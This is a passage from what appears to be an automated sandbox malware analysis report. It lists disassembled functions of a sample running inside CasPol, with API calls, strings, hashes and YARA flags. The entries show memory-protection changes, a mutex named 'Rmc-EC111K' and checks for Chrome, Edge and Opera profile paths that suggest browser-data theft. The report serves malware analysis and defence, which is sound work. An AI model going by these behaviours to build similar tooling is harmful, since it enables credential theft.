                                                                                                                                                                                                                                    • Part of subcall function 0457C7E6: GetProcAddress.KERNEL32(00000000,0457C7F4), ref: 0457C804
                                                                                                                                                                                                                                    • Part of subcall function 0457C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,0457C7F4,0457C7DD), ref: 0457C816
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc$ProtectVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2080333215-0
                                                                                                                                                                                                                                  • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                  • Instruction ID: 061bbc17fd86e03722ce428a84da3f98bf202b38da5fb623e1250826bc9c3a2c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F2127224082826FFB238BB47C04BB66FD8BB53364F180AB6D040DB143D5ACA445E3A6
                                                                                                                                                                                                                                  Function 0457C803 Relevance: 6.1, APIs: 4, Instructions: 54libraryloadermemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,0457C7F4), ref: 0457C804
                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,0457C7F4,0457C7DD), ref: 0457C816
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,0457C7DD), ref: 0457C838
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0457C860
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModuleProtectVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2492872976-0
                                                                                                                                                                                                                                  • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                  • Instruction ID: 52079f79515ed998600fe69fe78044496f3cfd8221067892db0e1ed90b83099b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CEF022016452413CFB2349B43C44EBA5FCCAB67320B140A72E001CB183D89CA506B3F2
                                                                                                                                                                                                                                  Function 0041B61A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3919263394-0
                                                                                                                                                                                                                                  • Opcode ID: ec720e96a51d184a4cda6b10cf2afb75cf85eefae2366cccc72a2835be63d5f5
                                                                                                                                                                                                                                  • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec720e96a51d184a4cda6b10cf2afb75cf85eefae2366cccc72a2835be63d5f5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                                                                                                                                                                                                  Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CountEventTick
                                                                                                                                                                                                                                  • String ID: >G
                                                                                                                                                                                                                                  • API String ID: 180926312-1296849874
                                                                                                                                                                                                                                  • Opcode ID: d32db71f486a6fab95b209cf5825fc6a662c6458aed09740a1026ad9af6751ae
                                                                                                                                                                                                                                  • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d32db71f486a6fab95b209cf5825fc6a662c6458aed09740a1026ad9af6751ae
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                                                                                                                                                                                                  Function 10008280 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 10008357
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 10008361
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                  • API String ID: 909987262-2556327735
                                                                                                                                                                                                                                  • Opcode ID: d1227933316caae7ae65396413c237c6ac1f7300808140ee21e47fe7c18da551
                                                                                                                                                                                                                                  • Instruction ID: 06a7295eeecc402cdca664894173e78d0fc65afa29d549bafe75b51b0943c357
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1227933316caae7ae65396413c237c6ac1f7300808140ee21e47fe7c18da551
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD213C353047508BE731DE5CA440A5AFBE8FBD1A90B600A6FE5D2C7746C772AB05C7A1
                                                                                                                                                                                                                                  Function 10006020 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(-00000002,\AppData\Local\Microsoft\Edge\,0000001E,00000000,-00000002,00000000), ref: 100060BB
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                                                                                                                  • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                                                                                                                                  • API String ID: 1174141254-2800177040
                                                                                                                                                                                                                                  • Opcode ID: dbbbc3d76f2423d9031401f89fe6b4dc2b02bfb56d3d2dbe79114fe0f00f05a4
                                                                                                                                                                                                                                  • Instruction ID: 85e45c25142740e28fbd5dc53a9d8ff5dbe67a4fa6c3c3076d736dc2108dc272
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbbbc3d76f2423d9031401f89fe6b4dc2b02bfb56d3d2dbe79114fe0f00f05a4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4721B575D04204DBDB14DFA8DC05BEFB7F9FF08740F208519E916A3245DB74A6058BA0
                                                                                                                                                                                                                                  Function 10006120 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(-00000002,\Opera Software\Opera Stable,0000001C,00000000,-00000002,00000000), ref: 100061BB
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                                                                                                                  • String ID: AppData$\Opera Software\Opera Stable
                                                                                                                                                                                                                                  • API String ID: 1174141254-1162561444
                                                                                                                                                                                                                                  • Opcode ID: 40f7c0777fb176b05e5bcc9634ede44232967ad3891fa828f3d9934c04a6ccd9
                                                                                                                                                                                                                                  • Instruction ID: f00d60261ac90b406eef5ab85d6db63d97fc6f89dbef8a3991c81c82add024b3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40f7c0777fb176b05e5bcc9634ede44232967ad3891fa828f3d9934c04a6ccd9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C221D675D04204EBEB14DFA8CC05BEFB7F9FF08780F608519E815A3285DB74A6058BA0
                                                                                                                                                                                                                                  Function 100063B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(-00000002,\Microsoft\Edge\Application\msedge.exe,00000026,00000000,-00000002), ref: 1000644B
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • \Microsoft\Edge\Application\msedge.exe, xrefs: 1000642B
                                                                                                                                                                                                                                  • ProgramFiles, xrefs: 100063D6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                                                                                                                  • String ID: ProgramFiles$\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                  • API String ID: 1174141254-1265440269
                                                                                                                                                                                                                                  • Opcode ID: dd8792878481810074d46a35867620a115f6c64e450a2a84bec02fab85e4a583
                                                                                                                                                                                                                                  • Instruction ID: b3486840681a8c9b7979fbf1c3b21a1cb547e06702c49159833d47058733cd9d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd8792878481810074d46a35867620a115f6c64e450a2a84bec02fab85e4a583
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F821D675D00204DBEB14DFA8CC05BEFB7F9FF08784F608519E916A3284DB74A9058BA0
                                                                                                                                                                                                                                  Function 10005F20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(-00000002,\AppData\Local\Google\Chrome\,0000001D,00000000,-00000002), ref: 10005FBB
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                                                                                                                  • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                                                                                                                                                  • API String ID: 1174141254-4188645398
                                                                                                                                                                                                                                  • Opcode ID: ef18bef4f912b1344f1dae269e817b18603800f9f05bc9141c2f07b6daeea7c6
                                                                                                                                                                                                                                  • Instruction ID: 77d355c08a898f8e50a63f28947c03bc0e31e75e4281b3d97ed022a44253448f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef18bef4f912b1344f1dae269e817b18603800f9f05bc9141c2f07b6daeea7c6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E21A175D04205DAEB14DFA8CC05BEFB7F8EF08741F508529E816A3284DB74A5058BA0
                                                                                                                                                                                                                                  Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                  • String ID: Rmc-EC111K
                                                                                                                                                                                                                                  • API String ID: 1925916568-165843323
                                                                                                                                                                                                                                  • Opcode ID: 296d9643a91431cf214b808cae9b7d77365ac793ad5cac5481aac8ac9a10b333
                                                                                                                                                                                                                                  • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 296d9643a91431cf214b808cae9b7d77365ac793ad5cac5481aac8ac9a10b333
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                                                                                                                                                                                                  Function 10004460 Relevance: 4.6, APIs: 3, Instructions: 123COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 100044DE
                                                                                                                                                                                                                                    • Part of subcall function 1000ADE3: __CxxThrowException@8.LIBVCRUNTIME ref: 1000ADFA
                                                                                                                                                                                                                                  • new.LIBCMT ref: 100044E4
                                                                                                                                                                                                                                  • new.LIBCMT ref: 100044F8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Concurrency::cancel_current_taskException@8Throw
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3598223435-0
                                                                                                                                                                                                                                  • Opcode ID: a64682e58749376715ff285614fed1e7cc0981f6ee9bc294163a27801b01aede
                                                                                                                                                                                                                                  • Instruction ID: 4acf8bbac3f2c21882ea0e06343d40b90099298c012174ff2abe7d7d1e891cfc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a64682e58749376715ff285614fed1e7cc0981f6ee9bc294163a27801b01aede
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 504104F1A00A018BF724DF68D880719B7E5EB452D1F120B2DE8538B68ADF70E944C7A6
                                                                                                                                                                                                                                  Function 00412513 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                                                                  • RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3677997916-0
                                                                                                                                                                                                                                  • Opcode ID: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                                                                                                                                                                  • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                                                                                                                                                                                                  Function 0041265D Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                                                                                                  • RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3677997916-0
                                                                                                                                                                                                                                  • Opcode ID: e356916b1740155a69653a68473027dca2ca6835ab0d3846d735c0fff301d5eb
                                                                                                                                                                                                                                  • Instruction ID: c18416eb0b1572374c3e2b3be0649ca89fc6f9e16ed4320a44d925c8ae57db2a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e356916b1740155a69653a68473027dca2ca6835ab0d3846d735c0fff301d5eb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD018131404229FBDF216FA1DC45DDF7F78EF11754F004065BA04A21A1D7758AB5DBA8
                                                                                                                                                                                                                                  Function 004124B7 Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                                                                                                                                  • RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3677997916-0
                                                                                                                                                                                                                                  • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                                                                                                                                  • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                                                                                                                                                                                  Function 0041246E Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                                                                                                                                                                                  • RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                                                                                                                                                                                  Memory Dump Source
